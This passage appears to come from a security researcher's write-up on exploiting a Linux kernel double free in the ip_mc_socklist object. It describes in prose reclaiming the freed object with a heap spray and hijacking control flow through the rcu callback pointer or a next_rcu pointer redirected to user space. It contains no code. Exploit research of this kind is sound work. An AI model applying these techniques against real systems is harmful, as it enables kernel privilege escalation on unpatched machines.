Once the real release path of the ip_mc_socklist object is understood, controlling the PC through the double free follows. There are generally two ways to exploit a double free: use the heap manager's behaviour to turn the double free into code execution, or reclaim the slot and turn the double free into a UAF (use-after-free). The second is used here. Because the timing of both frees is under our control, the freed object can be reclaimed with a heap spray after the first real kfree. By crafting the data in the reclaiming object, either control func (the callback address) in ip_mc_socklist.rcu to hijack the PC directly, or control next_rcu to redirect the ip_mc_socklist chain's next_rcu into user space and then modify the func pointer there to hijack the PC.

Approach two, controlling func directly: when debugging dynamically on Ubuntu earlier, I tried modifying func in memory by hand with gdb before the kfree_rcu in ip_mc_drop_socket several dozen times and still could not hijack the PC; I am evidently still unfamiliar with how the callback is stored and triggered.

Approach two, hijacking next_rcu: since there is no SMAP or PAN, once next_rcu is redirected to user space anything goes. A loop that keeps rewriting func ensures that when the callback fires, func holds the value we control.

The analysis process can also be found in the earlier article.

Jeremy's exploit also uses a function called bind_on_cpu. I did not understand its purpose at first; after removing the related calls, a kernel page request error appears in the log with high probability.
